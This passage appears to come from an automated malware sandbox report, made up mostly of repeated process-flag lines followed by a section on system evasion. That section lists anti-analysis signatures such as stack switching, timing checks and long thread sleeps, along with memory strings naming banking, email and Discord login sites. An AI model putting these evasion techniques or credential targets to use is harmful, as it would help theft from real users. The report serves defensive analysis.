                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                      Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                      Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                      Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                      Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                      Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                      Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                      Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C096E rdtsc 12_2_017C096E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7513Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2133Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3692Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5981Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\msinfo32.exeAPI coverage: 3.1 %
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5500Thread sleep count: 7513 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep count: 2133 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4260Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7672Thread sleep time: -40000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EBCAB0 FindFirstFileW,FindNextFileW,FindClose,16_2_02EBCAB0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: 6311_I4d42.16.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                      Source: HDLzkMKGEKBh.exe, 00000011.00000002.2657689695.000000000085F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv=
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: 6311_I4d42.16.drBinary or memory string: discord.comVMware20,11696494690f
                      Source: 6311_I4d42.16.drBinary or memory string: AMC password management pageVMware20,11696494690
                      Source: 6311_I4d42.16.drBinary or memory string: outlook.office.comVMware20,11696494690s
                      Source: 6311_I4d42.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                      Source: 6311_I4d42.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                      Source: 6311_I4d42.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: 6311_I4d42.16.drBinary or memory string: interactivebrokers.comVMware20,11696494690
